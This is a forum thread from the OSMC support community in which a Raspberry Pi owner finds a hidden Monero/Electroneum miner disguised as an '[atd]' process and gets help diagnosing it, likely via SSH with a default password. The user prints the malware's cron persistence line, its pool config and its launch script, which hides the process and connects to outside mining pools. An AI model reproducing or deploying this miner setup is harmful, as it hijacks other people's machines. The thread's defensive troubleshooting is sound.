[atd] strange process hogging cpu

Hello, I have a fresh installation of osmc and on top of clean installation, I have deluged, deluge-web and openvpn - installed via apt-get and flexget which was installed via official procedure. I also have some addons on kodi, installed from official kodi repository - those are trakt, watchdog, auto subs, XBMC check previous episode. I don’t have any 3rd party repositories on kodi.

I have noticed strange process called [atd] running under osmc user. This process keeps cpu at 100% and raspberry is around 80C.

If I kill the process, it will respawn after some time (usually a day). Furthermore, I do not have at nor atd installed - and they cannot be found on the system.

I doubt this is some kind of a malware or mining software. I see also there’s a cron entry under osmc user which I did not create: * * * * * /tmp/.xm/upd >/dev/null 2>&1

contents of the /tmp/.xm are:

-rw-r–r-- 1 osmc osmc 26 Jun 22 21:07 .a
-rw-r–r-- 1 osmc osmc 0 Jun 22 21:00 .aa
drwxr-xr-x 2 osmc osmc 4096 Jun 23 00:57 .jk
-rwxr-xr-x 1 osmc osmc 329 Oct 27 2017 a
-rw-r–r-- 1 osmc osmc 1 Jun 23 20:10 bash.pid
-rwxr-xr-x 1 osmc osmc 2318 Apr 22 11:14 c
-rw-r–r-- 1 osmc osmc 7571 Apr 19 21:37 config.txt
-rw-r–r-- 1 osmc osmc 39 Jun 22 21:00 cron.d
-rw-r–r-- 1 osmc osmc 9 Jun 22 21:00 dir.dir
-rwxr-xr-x 1 osmc osmc 15125 Feb 20 2016 h32
-rwxr-xr-x 1 osmc osmc 838583 Feb 20 2016 h64
-rw-r–r-- 1 osmc osmc 1299781 Jun 17 08:34 jk.tgz
-rwxr-xr-x 1 osmc osmc 227220 May 4 14:18 md32
-rw-r–r-- 1 osmc osmc 1500 Jun 11 17:11 pools.txt
-rwxr-xr-x 1 osmc osmc 558 May 28 21:40 run
drwxr-xr-x 2 osmc osmc 4096 May 25 23:34 stak
-rwxr–r-- 1 osmc osmc 173 Jun 22 21:00 upd
-rwxr-xr-x 1 osmc osmc 24 Oct 4 2017 x
-rwxr-xr-x 1 osmc osmc 76 Apr 17 13:58 z

ps -ef | grep -i atd:

osmc 2459 1 99 Jun22 ? 1-01:15:07 [atd]

root@osmc:/tmp# file /proc/2459/exe
/proc/2459/exe: symbolic link to /usr/bin/perl

How do I eradicate this and how do I track down where it came from?

Thanks!

Creating a hidden file under /tmp seems fairly suspicious to me. Take a look at the actual content of some of those temp files and maybe you will get an idea of what it it.

atd is the at daemon. at jobs are similar to cron jobs (but started differently). at is not normally installed on OSMC, so one of the packages you installed had to have added it. And it should not be running at 100%.

1 Like

It is suspicious. Some of the files are ascii (text) and there are 3 executables, one 32bit one 64bit.
root@osmc:/tmp/.xm# cat pools.txt
/*
* pool_address - Pool address should be in the form “pool.supportxmr.com:333 3”. Only stratum pools are supported.
* wallet_address - Your wallet, or pool login.
* rig_id - Rig identifier for pool-side statistics (needs pool support ).
* pool_password - Can be empty in most cases or “x”.
* use_nicehash - Limit the nonce to 3 bytes as required by nicehash.
* use_tls - This option will make us connect using Transport Layer Secu rity.
* tls_fingerprint - Server’s SHA256 fingerprint. If this string is non-empty th en we will check the server’s cert against it.
* pool_weight - Pool weight is a number telling the miner how important the pool is. Miner will mine mostly at the pool
* with the highest weight, unless the pool fails. Weight must be an integer larger than 0.
*
* We feature pools up to 1MH/s. For a more complete list see M5M400’s pool list at www.moneropools.com
*/

"pool_list" :
[
        {"pool_address" : "185.148.147.132:8080", "wallet_address" : "xxx", "poo                                                                                                  l_password" : "x", "use_nicehash" : true, "rig_id" : "", "use_tls" : false, "tls                                                                                                  _fingerprint" : "", "pool_weight" : 1 },
],




/*
 * Currency to mine. Supported values:
 *
 *    aeon7 (use this for Aeon's new PoW)
 *    cryptonight (try this if your coin is not listed)
 *    cryptonight_lite
 *    edollar
 *    electroneum
 *    graft
 *    intense
 *    karbo
 *    monero7 (use this for Monero's new PoW)
 *    sumokoin
 *
 */

"currency" : "monero7",

root@osmc:/tmp/.xm# cat run
#!/bin/bash
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://45.32.155.230:3333 -u etnk5c12V3YAb5gLekc5N8SizEpbpDogviaU2U9tff2F9JafNFS9pxmF1PNf4aZrMjRSqd9bhjXn7dbpmepNjKi586ZtD9Cv9N -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmr-stak >>/dev/null &
fi
echo $! > bash.pid

Like I said, packages were mostly from official apt repos except for flexget which I doubt that was the source of this. Also, this thing is running under osmc user so I suspect this came from some of the kodi addons - but the thing is, all of them were official addons so I’m confused.

There’s your answer. You somehow got a miner :wink:

Back up and re-install would be your best bet, and this time be more careful about what you install.

You could look through your apt logs to see if you can figure out what package installed atd.

The thing is, this has already happened recently. I have tried to track it down and failed so I reinstalled the whole damn thing. Previously I had 3rd party streaming addon and I was almost 100% sure that was the source of it. This time, I did not install any 3rd party addons to kodi. So the only thing that’s not from official packages is flexget but I really doubt that is the source. Especially since flexget is running under root while this thing is running under osmc user.

So this has happened before?

A process running as root can spawn processes running as other users. But, it may not be part of flexget. It may be bundled with the flexget installation scripts. Since that’s the only non-official thing that you’ve installed, that’s the best one to look at.

Re-install without flexget and see if the problem is gone. Then you will know for sure.

Try looking at the apt logs. You may get a clue from them how atd got installed. Note that atd is not bad, but apparently being used for bad things.

Yes, it has happened recently. This installation is just a few days old. atd is not installed (nor is at), and this thing is masking itself under atd process. I might reinstall but I’d rather track it down if possible - or remove it completely. I’m gonna post on flexget forums now but if they are distributing this (which I really doubt they are), I don’t think they will say “hey, yeah, we pushed a cryptocurrency miner to your box”

Share your apt logs, there may be a clue there:

$ grab-logs -a

You don’t have your ssh port open to the world do you? If you do I hope you changed your osmc password to something secure.

https://paste.osmc.tv/yijowoyoce

I do have ssh open but osmc is running on a private IP, sshd on 22, but there is no rule to forward to 22 - I have a high random port that is being translated/redirected to port 22. There is no evidence of someone logging in from the internet:

osmc@osmc:~$ last
root     pts/0        192.168.1.60     Sat Jun 23 20:56   still logged in
root     pts/0        192.168.1.60     Sat Jun 23 20:01 - 20:31  (00:30)
root     pts/0        192.168.1.60     Sat Jun 23 19:59 - 20:00  (00:01)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00   still running
root     pts/0        192.168.1.60     Thu Jun 21 23:33 - 23:34  (00:00)
root     pts/0        192.168.1.60     Wed Jun 20 19:35 - 19:38  (00:02)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00   still running
root     pts/0        192.168.1.60     Wed Jun 20 19:05 - down   (00:29)
root     pts/1        192.168.1.60     Wed Jun 20 18:54 - down   (00:40)
root     pts/0        192.168.1.60     Wed Jun 20 18:53 - 19:05  (00:12)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 19:35 (17702+17:35)
root     pts/0        192.168.1.60     Wed Jun 20 18:41 - down   (00:11)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 18:52 (17702+16:52)
osmc     pts/0        192.168.0.118    Wed Jun 20 18:35 - 18:35  (00:00)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 18:35 (17702+16:35)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 13:29 (17691+11:29)

From the logs, I don’t see anything suspicious installed. So again, it points to how you installed flexget. And it’s interesting that flexget does not show in the logs.

But…

This is dangerous if you did not change the osmc password!

[EDIT] thinking more about this and I now strongly suspect that it’s ssh that’s your problem. You won’t see someone logged in, the bot would have found you, installed it’s payload and left in a hurry. So I’d say re-install and this time do not open 22 (or forwarded to another port) unless you change the password to a strong password, or better yet only allow ssh logins using a key.

Flexget was installed following official installation procedure, here: https://flexget.com/InstallWizard/Linux

But if a bot did this, there would be a trace somewhere? I have also posted on flexget forums so in case no one there is willing to track it down, I’ll reinstall then.

One thing I did notice, it looks like you installed cron? Just want to make sure it was you. [EDIT] I’m guessing you installed cron for flexget?

There may be. Full logs could have a clue somewhere.

Once I knew that you had ssh open, it became obvious to me that flexget probably is not the problem, ssh is.

You could try cleaning up by fixing your crontab:

$ crontab -e

and also remove the /tmp/.xm directory. Also check your .profile for any nastyness and then reboot.

Yes, cron was installed by me (flexget is running via cron under root account). When this happened for the first time, I have tried that - removing the cron entry and removing the /tmp/.xm directory and it came back. After that I removed all the addons and again cleared the crontab and and it came back again. Then I reinstalled. I’m gonna try again, maybe ssh really was the issue (previous installation also had the default password for osmc user)

Re-installing would probably be your quickest fix. I don’t know enough about how those bots operate to be able to help you figure out how to clean up the mess it left behind. It would take longer if figure it out than to re-install. (and we may not totally clean up it’s mess).

Let us know if it was indeed ssh causing the problem.

1 Like

From reading the installation instructions that you linked, you don’t need to install cron:

Using systemd/timers
If your system is running with systemd you can directly configure it to run the command every hours as the current user with the following command:

systemd-run --on-active="1h" --uid=`id -u` --gid=`id -g` `which flexget` execute
This will prompt you for the root password (as system services require root to be configured) and then will let you know the name of the service. You can confirm it was scheduled by looking at the system.d scheduler with systemctl list-timers.

Also from the official installation guide:

FlexGet is meant to be executed from users own crontab, not from /etc/crontab (root). Although this is possible it is highly discouraged.

So if you do decide to use cron, use the osmc user, not root.

Right. I’m running flexget under crong for so long I didn’t even see this option. Just changed to systemd with osmc user.

A portscan would find that port and try it, probably using osmc/osmc. The first thing an intruder does it remove all traces of the break-in. Don’t know if you changed password but i would do it before opening anyport to the device.

I would reinstall.

last -9 may also show you other people that accessed your device.